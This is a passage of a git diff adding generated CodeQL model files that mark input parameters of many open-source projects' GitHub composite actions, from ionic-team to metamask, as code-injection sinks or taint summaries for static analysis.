"code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.totalShards", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.shard", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.folder", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.version", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.filename", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/actions/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml new file mode 100644 index 000000000000..ce748cd8fc92 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.version", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.filename", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/actions/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml new file mode 100644 index 000000000000..ae43fb8964db --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.docker-username", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.docker-token", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.build", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/actions/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml new file mode 100644 index 000000000000..06f888fdecfa --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/actions/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml new file mode 100644 index 000000000000..170505a19019 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -0,0 +1,27 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-packaging", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-environment", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jdl-entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jdl-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.package-with-executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/actions/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml new file mode 100644 index 000000000000..3bc3b24cba85 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/actions/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml new file mode 100644 index 000000000000..9ac0e61a0289 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.storage", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.meta", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.name", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.mysql_password", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.file_test_mode", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.file_total_size", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/actions/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml new file mode 100644 index 000000000000..2b22333ba027 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/actions/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml new file mode 100644 index 000000000000..5277000b2735 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "input.jobs", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/actions/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml new file mode 100644 index 000000000000..e596c90c79dc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] + - ["kserve/kserve", "*", "input.deployment-mode", "code-injection", "generated"] + - ["kserve/kserve", "*", "input.network-layer", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml new file mode 100644 index 000000000000..226fab0382b9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.database-type", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.training-operator", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.katib-ui", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.trial-images", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml new file mode 100644 index 000000000000..892cd78749be --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml new file mode 100644 index 000000000000..f7bd2567ec81 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml new file mode 100644 index 000000000000..126bf5c28d78 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml new file mode 100644 index 000000000000..9ce67a2592d4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] + - ["kubescape/kubescape", "*", "input.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml new file mode 100644 index 000000000000..11e82c1bf249 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] + - ["kubeshop/botkube", "*", "input.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/actions/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml new file mode 100644 index 000000000000..06418a823ebe --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "input.sbom-name", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "input.makefile-target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/actions/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml new file mode 100644 index 000000000000..f2d07bc848d0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.vcpkg_token", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.part", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.arm-build", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml new file mode 100644 index 000000000000..e1e80cb9eb6f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/actions/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml new file mode 100644 index 000000000000..8a8760c9bf67 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.mesheryToken", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.application_url", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.prNumber", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.designID", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.application_type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/actions/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml new file mode 100644 index 000000000000..9374557b62a3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.build_targets", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.host_dc", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.llvm_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.build_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.arch", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.os", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.cross_target_triple", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.ios_deployment_target", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.cross_compiling", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/actions/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml new file mode 100644 index 000000000000..5a27009da98f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "input.turborepo-server-port", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "input.turbo-server-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/actions/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml new file mode 100644 index 000000000000..6ca81714510b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/actions/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml new file mode 100644 index 000000000000..0bd932956056 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] + - ["lf-edge/eve", "*", "input.dockerhub-account", "code-injection", "generated"] + - ["lf-edge/eve", "*", "input.dockerhub-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/actions/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml new file mode 100644 index 000000000000..896c7ab520ae --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.container-version", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.container", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.base", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.config-path", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.registry", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.dockerfile", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/actions/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml new file mode 100644 index 000000000000..50bfce009b08 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-folder", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pip-flags", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-extra", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.nb-dirs", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.wheel-dir", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.torch-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/actions/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml new file mode 100644 index 000000000000..8cbaa9ccc744 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "input.torch-url", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "input.pytorch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/actions/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml new file mode 100644 index 000000000000..e25e7fd7560c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-registry", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] + - ["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"] + - ["linkerd/linkerd2", "*", "input.docker-registry", "output.image", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/actions/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml new file mode 100644 index 000000000000..d1228eb3df96 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.theme-mode", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.graph-directory", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.output-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/actions/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml new file mode 100644 index 000000000000..b987ca6683bc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] + - ["macvim-dev/macvim", "*", "input.formula", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/actions/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml new file mode 100644 index 000000000000..20060fa74459 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "input.key_base", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "input.key_prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/actions/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml new file mode 100644 index 000000000000..297b47a3ff53 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.externalData", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testSpecArn", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testFilter", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.appFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testPackageType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.appType", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/actions/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml new file mode 100644 index 000000000000..16a0386beabc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/actions/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml new file mode 100644 index 000000000000..37556bcb99d9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "input.aws_key_id", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "input.artifact_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/actions/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml new file mode 100644 index 000000000000..9532f50714ef --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.full-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.micromamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.mamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.extra-conda-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.isolation", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.build-docs", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.build-tests", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/actions/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml new file mode 100644 index 000000000000..465b4145aebe --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] + - ["medic/cht-core", "*", "input.password", "code-injection", "generated"] + - ["medic/cht-core", "*", "input.username", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/actions/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml new file mode 100644 index 000000000000..b607b57693cc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] + - ["medusajs/medusa", "*", "input.password", "code-injection", "generated"] + - ["medusajs/medusa", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/actions/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml new file mode 100644 index 000000000000..76243ecd6006 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.github_token", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.username", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.test-args", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.clojure-version", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.include-log", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.message", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.mysql", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.postgres", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.openldap", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.maildev", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.edition", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/actions/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml new file mode 100644 index 000000000000..68c5a0b4b69d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "input.created-pr-status", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "input.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/actions/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml new file mode 100644 index 